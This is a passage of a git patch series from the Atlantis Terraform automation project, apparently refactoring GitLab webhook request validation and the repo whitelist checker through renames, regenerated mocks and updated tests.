end of file From c98d1040c584b2956bab67bb3f83558696301563 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 12:42:25 +0100 Subject: [PATCH 37/69] Update e2e for new version. --- e2e/e2e.go | 9 +-------- e2e/main.go | 5 ++--- 2 files changed, 3 insertions(+), 11 deletions(-) diff --git a/e2e/e2e.go b/e2e/e2e.go index 041f240d7b..bf51830782 100644 --- a/e2e/e2e.go +++ b/e2e/e2e.go @@ -128,14 +128,7 @@ func (t *E2ETester) Start() (*E2EResult, error) { // defer closing pull request and delete remote branch defer cleanUp(t, pull.GetNumber(), branchName) // nolint: errcheck - // create run plan comment - log.Printf("creating plan comment: %q", t.projectType.PlanCommand) - _, _, err = t.githubClient.client.Issues.CreateComment(t.githubClient.ctx, t.ownerName, t.repoName, pull.GetNumber(), &github.IssueComment{Body: github.String(t.projectType.PlanCommand)}) - if err != nil { - return e2eResult, fmt.Errorf("error creating 'run plan' comment on github") - } - - // wait for atlantis to respond to webhook + // wait for atlantis to respond to webhook and autoplan. time.Sleep(2 * time.Second) state := "not started" diff --git a/e2e/main.go b/e2e/main.go index 0f1e9f274a..8513032415 100644 --- a/e2e/main.go +++ b/e2e/main.go @@ -27,13 +27,12 @@ import ( var defaultAtlantisURL = "http://localhost:4141" var projectTypes = []Project{ - {"standalone", "atlantis plan", "atlantis apply"}, - {"standalone-with-workspace", "atlantis plan -w staging", "atlantis apply -w staging"}, + {"standalone", "atlantis apply -d standalone"}, + {"standalone-with-workspace", "atlantis apply -d standalone-with-workspace -w staging"}, } type Project struct { Name string - PlanCommand string ApplyCommand string } From 0c966d50e9b4e3d00cc2a8bfc24f2f653f1b10bb Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 15:11:44 +0100 Subject: [PATCH 38/69] GitlabRequestParser -> GitlabRequestParserValidator --- server/events_controller.go | 8 +- server/events_controller_e2e_test.go | 14 ++-- server/events_controller_test.go | 52 ++++++------ ....go => gitlab_request_parser_validator.go} | 22 ++--- ...> gitlab_request_parser_validator_test.go} | 18 ++-- server/mocks/mock_gitlab_request_parser.go | 84 ------------------- .../mock_gitlab_request_parser_validator.go | 84 +++++++++++++++++++ server/server.go | 28 +++---- 8 files changed, 155 insertions(+), 155 deletions(-) rename server/{gitlab_request_parser.go => gitlab_request_parser_validator.go} (74%) rename server/{gitlab_request_parser_test.go => gitlab_request_parser_validator_test.go} (96%) delete mode 100644 server/mocks/mock_gitlab_request_parser.go create mode 100644 server/mocks/mock_gitlab_request_parser_validator.go diff --git a/server/events_controller.go b/server/events_controller.go index a132b094c9..95faa70299 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -39,9 +39,9 @@ type EventsController struct { // GithubWebHookSecret is the secret added to this webhook via the GitHub // UI that identifies this call as coming from GitHub. If empty, no // request validation is done. - GithubWebHookSecret []byte - GithubRequestValidator GithubRequestValidator - GitlabRequestParser GitlabRequestParser + GithubWebHookSecret []byte + GithubRequestValidator GithubRequestValidator + GitlabRequestParserValidator GitlabRequestParserValidator // GitlabWebHookSecret is the secret added to this webhook via the GitLab // UI that identifies this call as coming from GitLab. If empty, no // request validation is done. @@ -208,7 +208,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep } func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) { - event, err := e.GitlabRequestParser.Validate(r, e.GitlabWebHookSecret) + event, err := e.GitlabRequestParserValidator.ParseAndValidate(r, e.GitlabWebHookSecret) if err != nil { e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 6044b0163f..f1dc0958fa 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -286,13 +286,13 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, VCSClient: e2eVCSClient, Workspace: atlantisWorkspace, }, - Logger: logger, - Parser: eventParser, - CommentParser: commentParser, - GithubWebHookSecret: nil, - GithubRequestValidator: &server.DefaultGithubRequestValidator{}, - GitlabRequestParser: &server.DefaultGitlabRequestParser{}, - GitlabWebHookSecret: nil, + Logger: logger, + Parser: eventParser, + CommentParser: commentParser, + GithubWebHookSecret: nil, + GithubRequestValidator: &server.DefaultGithubRequestValidator{}, + GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, + GitlabWebHookSecret: nil, RepoWhitelist: &events.RepoWhitelist{ Whitelist: "*", }, diff --git a/server/events_controller_test.go b/server/events_controller_test.go index bb0682ba6f..9d35a22655 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -90,7 +90,7 @@ func TestPost_InvalidGitlabSecret(t *testing.T) { w := httptest.NewRecorder() req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(nil, errors.New("err")) + When(gl.ParseAndValidate(req, secret)).ThenReturn(nil, errors.New("err")) e.Post(w, req) responseContains(t, w, http.StatusBadRequest, "err") } @@ -112,7 +112,7 @@ func TestPost_UnsupportedGitlabEvent(t *testing.T) { w := httptest.NewRecorder() req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil) e.Post(w, req) responseContains(t, w, http.StatusOK, "Ignoring unsupported event") } @@ -148,7 +148,7 @@ func TestPost_GitlabCommentInvalidCommand(t *testing.T) { e, _, gl, _, _, _, _, cp := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{Ignore: true}) w := httptest.NewRecorder() e.Post(w, req) @@ -174,13 +174,13 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) { RegisterMockTestingT(t) vcsClient := vcsmocks.NewMockClientProxy() e := server.EventsController{ - Logger: logging.NewNoopLogger(), - CommentParser: &events.CommentParser{}, - GitlabRequestParser: &server.DefaultGitlabRequestParser{}, - Parser: &events.EventParser{}, - SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, - RepoWhitelist: &events.RepoWhitelist{}, - VCSClient: vcsClient, + Logger: logging.NewNoopLogger(), + CommentParser: &events.CommentParser{}, + GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, + Parser: &events.EventParser{}, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, + RepoWhitelist: &events.RepoWhitelist{}, + VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json")) Ok(t, err) @@ -231,7 +231,7 @@ func TestPost_GitlabCommentResponse(t *testing.T) { e, _, gl, _, _, _, vcsClient, cp := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{CommentResponse: "a comment"}) w := httptest.NewRecorder() e.Post(w, req) @@ -262,7 +262,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) { e, _, gl, _, cr, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") @@ -362,7 +362,7 @@ func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) @@ -395,7 +395,7 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { e, _, gl, p, _, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) @@ -404,26 +404,26 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") } -func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParser, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { +func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { RegisterMockTestingT(t) v := mocks.NewMockGithubRequestValidator() - gl := mocks.NewMockGitlabRequestParser() + gl := mocks.NewMockGitlabRequestParserValidator() p := emocks.NewMockEventParsing() cp := emocks.NewMockCommentParsing() cr := emocks.NewMockCommandRunner() c := emocks.NewMockPullCleaner() vcsmock := vcsmocks.NewMockClientProxy() e := server.EventsController{ - Logger: logging.NewNoopLogger(), - GithubRequestValidator: v, - Parser: p, - CommentParser: cp, - CommandRunner: cr, - PullCleaner: c, - GithubWebHookSecret: secret, - SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, - GitlabWebHookSecret: secret, - GitlabRequestParser: gl, + Logger: logging.NewNoopLogger(), + GithubRequestValidator: v, + Parser: p, + CommentParser: cp, + CommandRunner: cr, + PullCleaner: c, + GithubWebHookSecret: secret, + SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, + GitlabWebHookSecret: secret, + GitlabRequestParserValidator: gl, RepoWhitelist: &events.RepoWhitelist{ Whitelist: "*", }, diff --git a/server/gitlab_request_parser.go b/server/gitlab_request_parser_validator.go similarity index 74% rename from server/gitlab_request_parser.go rename to server/gitlab_request_parser_validator.go index 94ab4ddd5a..ee486248f9 100644 --- a/server/gitlab_request_parser.go +++ b/server/gitlab_request_parser_validator.go @@ -24,18 +24,18 @@ import ( const secretHeader = "X-Gitlab-Token" // #nosec -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser.go GitlabRequestParser +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser_validator.go GitlabRequestParserValidator -// GitlabRequestParser parses and validates GitLab requests. -type GitlabRequestParser interface { - // Validate validates that the request has a token header matching secret. +// GitlabRequestParserValidator parses and validates GitLab requests. +type GitlabRequestParserValidator interface { + // ParseAndValidate validates that the request has a token header matching secret. // If the secret does not match it returns an error. // If secret is empty it does not check the token header. // It then parses the request as a GitLab object depending on the header // provided by GitLab identifying the webhook type. If the webhook type // is not recognized it will return nil but will not return an error. // Usage: - // event, err := GitlabRequestParser.Validate(r, secret) + // event, err := GitlabRequestParserValidator.ParseAndValidate(r, secret) // if err != nil { // return // } @@ -47,15 +47,15 @@ type GitlabRequestParser interface { // default: // // unsupported event // } - Validate(r *http.Request, secret []byte) (interface{}, error) + ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) } -// DefaultGitlabRequestParser parses and validates GitLab requests. -type DefaultGitlabRequestParser struct{} +// DefaultGitlabRequestParserValidator parses and validates GitLab requests. +type DefaultGitlabRequestParserValidator struct{} -// Validate returns the JSON payload of the request. -// See GitlabRequestParser.Validate() -func (d *DefaultGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) { +// ParseAndValidate returns the JSON payload of the request. +// See GitlabRequestParserValidator.ParseAndValidate(). +func (d *DefaultGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) { const mergeEventHeader = "Merge Request Hook" const noteEventHeader = "Note Hook" diff --git a/server/gitlab_request_parser_test.go b/server/gitlab_request_parser_validator_test.go similarity index 96% rename from server/gitlab_request_parser_test.go rename to server/gitlab_request_parser_validator_test.go index 385d718795..eacbc1d4a2 100644 --- a/server/gitlab_request_parser_test.go +++ b/server/gitlab_request_parser_validator_test.go @@ -24,7 +24,7 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -var parser = server.DefaultGitlabRequestParser{} +var parser = server.DefaultGitlabRequestParserValidator{} func TestValidate_InvalidSecret(t *testing.T) { t.Log("If the secret header is set and doesn't match expected an error is returned") @@ -33,7 +33,7 @@ func TestValidate_InvalidSecret(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Token", "does-not-match") - _, err = parser.Validate(req, []byte("secret")) + _, err = parser.ParseAndValidate(req, []byte("secret")) Assert(t, err != nil, "should be an error") Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error()) } @@ -46,7 +46,7 @@ func TestValidate_ValidSecret(t *testing.T) { Ok(t, err) req.Header.Set("X-Gitlab-Token", "secret") req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, []byte("secret")) + b, err := parser.ParseAndValidate(req, []byte("secret")) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) } @@ -59,7 +59,7 @@ func TestValidate_NoSecret(t *testing.T) { Ok(t, err) req.Header.Set("X-Gitlab-Token", "random secret") req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) } @@ -71,7 +71,7 @@ func TestValidate_InvalidMergeEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - _, err = parser.Validate(req, nil) + _, err = parser.ParseAndValidate(req, nil) Assert(t, err != nil, "should be an error") Equals(t, "unexpected end of JSON input", err.Error()) } @@ -83,7 +83,7 @@ func TestValidate_InvalidMergeCommentEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Note Hook") - _, err = parser.Validate(req, nil) + _, err = parser.ParseAndValidate(req, nil) Assert(t, err != nil, "should be an error") Equals(t, "unexpected end of JSON input", err.Error()) } @@ -95,7 +95,7 @@ func TestValidate_UnrecognizedEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Random Event") - event, err := parser.Validate(req, nil) + event, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, nil, event) } @@ -107,7 +107,7 @@ func TestValidate_ValidMergeEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) RegisterMockTestingT(t) @@ -120,7 +120,7 @@ func TestValidate_ValidMergeCommentEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Note Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name) RegisterMockTestingT(t) diff --git a/server/mocks/mock_gitlab_request_parser.go b/server/mocks/mock_gitlab_request_parser.go deleted file mode 100644 index e4598a1fe1..0000000000 --- a/server/mocks/mock_gitlab_request_parser.go +++ /dev/null @@ -1,84 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParser) - -package mocks - -import ( - http "net/http" - "reflect" - - pegomock "github.com/petergtz/pegomock" -) - -type MockGitlabRequestParser struct { - fail func(message string, callerSkip ...int) -} - -func NewMockGitlabRequestParser() *MockGitlabRequestParser { - return &MockGitlabRequestParser{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) { - params := []pegomock.Param{r, secret} - result := pegomock.GetGenericMockFrom(mock).Invoke("Validate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) - var ret0 interface{} - var ret1 error - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(interface{}) - } - if result[1] != nil { - ret1 = result[1].(error) - } - } - return ret0, ret1 -} - -func (mock *MockGitlabRequestParser) VerifyWasCalledOnce() *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, pegomock.Times(1), nil} -} - -func (mock *MockGitlabRequestParser) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, invocationCountMatcher, nil} -} - -func (mock *MockGitlabRequestParser) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierGitlabRequestParser struct { - mock *MockGitlabRequestParser - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierGitlabRequestParser) Validate(r *http.Request, secret []byte) *GitlabRequestParser_Validate_OngoingVerification { - params := []pegomock.Param{r, secret} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Validate", params) - return &GitlabRequestParser_Validate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type GitlabRequestParser_Validate_OngoingVerification struct { - mock *MockGitlabRequestParser - methodInvocations []pegomock.MethodInvocation -} - -func (c *GitlabRequestParser_Validate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) { - r, secret := c.GetAllCapturedArguments() - return r[len(r)-1], secret[len(secret)-1] -} - -func (c *GitlabRequestParser_Validate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*http.Request, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*http.Request) - } - _param1 = make([][]byte, len(params[1])) - for u, param := range params[1] { - _param1[u] = param.([]byte) - } - } - return -} diff --git a/server/mocks/mock_gitlab_request_parser_validator.go b/server/mocks/mock_gitlab_request_parser_validator.go new file mode 100644 index 0000000000..c23738294a --- /dev/null +++ b/server/mocks/mock_gitlab_request_parser_validator.go @@ -0,0 +1,84 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParserValidator) + +package mocks + +import ( + http "net/http" + "reflect" + + pegomock "github.com/petergtz/pegomock" +) + +type MockGitlabRequestParserValidator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockGitlabRequestParserValidator() *MockGitlabRequestParserValidator { + return &MockGitlabRequestParserValidator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) { + params := []pegomock.Param{r, secret} + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseAndValidate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 interface{} + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(interface{}) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalledOnce() *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, pegomock.Times(1), nil} +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, nil} +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierGitlabRequestParserValidator struct { + mock *MockGitlabRequestParserValidator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification { + params := []pegomock.Param{r, secret} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseAndValidate", params) + return &GitlabRequestParserValidator_ParseAndValidate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type GitlabRequestParserValidator_ParseAndValidate_OngoingVerification struct { + mock *MockGitlabRequestParserValidator + methodInvocations []pegomock.MethodInvocation +} + +func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) { + r, secret := c.GetAllCapturedArguments() + return r[len(r)-1], secret[len(secret)-1] +} + +func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*http.Request, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*http.Request) + } + _param1 = make([][]byte, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.([]byte) + } + } + return +} diff --git a/server/server.go b/server/server.go index 734a36de4d..63bd77a83f 100644 --- a/server/server.go +++ b/server/server.go @@ -273,20 +273,20 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockDetailTemplate: lockTemplate, } eventsController := &EventsController{ - CommandRunner: commandHandler, - PullCleaner: pullClosedExecutor, - Parser: eventParser, - CommentParser: commentParser, - Logger: logger, - GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret), - GithubRequestValidator: &DefaultGithubRequestValidator{}, - GitlabRequestParser: &DefaultGitlabRequestParser{}, - GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret), - RepoWhitelist: repoWhitelist, - SupportedVCSHosts: supportedVCSHosts, - VCSClient: vcsClient, - AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, - AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, + CommandRunner: commandHandler, + PullCleaner: pullClosedExecutor, + Parser: eventParser, + CommentParser: commentParser, + Logger: logger, + GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret), + GithubRequestValidator: &DefaultGithubRequestValidator{}, + GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{}, + GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret), + RepoWhitelist: repoWhitelist, + SupportedVCSHosts: supportedVCSHosts, + VCSClient: vcsClient, + AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, + AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, From d359131a29eec90e588eef6d5d9f4d4cc6c36218 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 15:20:10 +0100 Subject: [PATCH 39/69] RepoWhitelist -> RepoWhitelistChecker --- ...repo_whitelist.go => repo_whitelist_checker.go} | 8 ++++---- ...list_test.go => repo_whitelist_checker_test.go} | 4 ++-- server/events_controller.go | 8 ++++---- server/events_controller_e2e_test.go | 2 +- server/events_controller_test.go | 14 +++++++------- server/router.go | 2 +- server/server.go | 4 ++-- 7 files changed, 21 insertions(+), 21 deletions(-) rename server/events/{repo_whitelist.go => repo_whitelist_checker.go} (86%) rename server/events/{repo_whitelist_test.go => repo_whitelist_checker_test.go} (96%) diff --git a/server/events/repo_whitelist.go b/server/events/repo_whitelist_checker.go similarity index 86% rename from server/events/repo_whitelist.go rename to server/events/repo_whitelist_checker.go index 06c500f48b..0e45401332 100644 --- a/server/events/repo_whitelist.go +++ b/server/events/repo_whitelist_checker.go @@ -21,16 +21,16 @@ import ( // Wildcard matches 0-n of all characters except commas. const Wildcard = "*" -// RepoWhitelist implements checking if repos are whitelisted to be used with +// RepoWhitelistChecker implements checking if repos are whitelisted to be used with // this Atlantis. -type RepoWhitelist struct { +type RepoWhitelistChecker struct { // Whitelist is a comma separated list of rules with wildcards '*' allowed. Whitelist string } // IsWhitelisted returns true if this repo is in our whitelist and false // otherwise. -func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) bool { +func (r *RepoWhitelistChecker) IsWhitelisted(repoFullName string, vcsHostname string) bool { candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName) rules := strings.Split(r.Whitelist, ",") for _, rule := range rules { @@ -41,7 +41,7 @@ func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) b return false } -func (r *RepoWhitelist) matchesRule(rule string, candidate string) bool { +func (r *RepoWhitelistChecker) matchesRule(rule string, candidate string) bool { // Case insensitive compare. rule = strings.ToLower(rule) candidate = strings.ToLower(candidate) diff --git a/server/events/repo_whitelist_test.go b/server/events/repo_whitelist_checker_test.go similarity index 96% rename from server/events/repo_whitelist_test.go rename to server/events/repo_whitelist_checker_test.go index 21e3585725..d6f3f07e11 100644 --- a/server/events/repo_whitelist_test.go +++ b/server/events/repo_whitelist_checker_test.go @@ -20,7 +20,7 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -func TestIsWhitelisted(t *testing.T) { +func TestRepoWhitelistChecker_IsWhitelisted(t *testing.T) { cases := []struct { Description string Whitelist string @@ -151,7 +151,7 @@ func TestIsWhitelisted(t *testing.T) { for _, c := range cases { t.Run(c.Description, func(t *testing.T) { - w := events.RepoWhitelist{Whitelist: c.Whitelist} + w := events.RepoWhitelistChecker{Whitelist: c.Whitelist} Equals(t, c.Exp, w.IsWhitelisted(c.RepoFullName, c.Hostname)) }) } diff --git a/server/events_controller.go b/server/events_controller.go index 95faa70299..3db62bd96e 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -45,8 +45,8 @@ type EventsController struct { // GitlabWebHookSecret is the secret added to this webhook via the GitLab // UI that identifies this call as coming from GitLab. If empty, no // request validation is done. - GitlabWebHookSecret []byte - RepoWhitelist *events.RepoWhitelist + GitlabWebHookSecret []byte + RepoWhitelistChecker *events.RepoWhitelistChecker // SupportedVCSHosts is which VCS hosts Atlantis was configured upon // startup to support. SupportedVCSHosts []models.VCSHostType @@ -159,7 +159,7 @@ const ClosedPullEvent = "closed" const OtherPullEvent = "other" func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) { - if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { // If the repo isn't whitelisted and we receive an opened pull request // event we comment back on the pull request that the repo isn't // whitelisted. This is because the user might be expecting Atlantis to @@ -254,7 +254,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. - if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + if !e.RepoWhitelistChecker.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { e.commentNotWhitelisted(baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index f1dc0958fa..7d9f300a72 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -293,7 +293,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, GithubRequestValidator: &server.DefaultGithubRequestValidator{}, GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, GitlabWebHookSecret: nil, - RepoWhitelist: &events.RepoWhitelist{ + RepoWhitelistChecker: &events.RepoWhitelistChecker{ Whitelist: "*", }, SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, diff --git a/server/events_controller_test.go b/server/events_controller_test.go index 9d35a22655..a7f5c81a69 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -177,10 +177,10 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) { Logger: 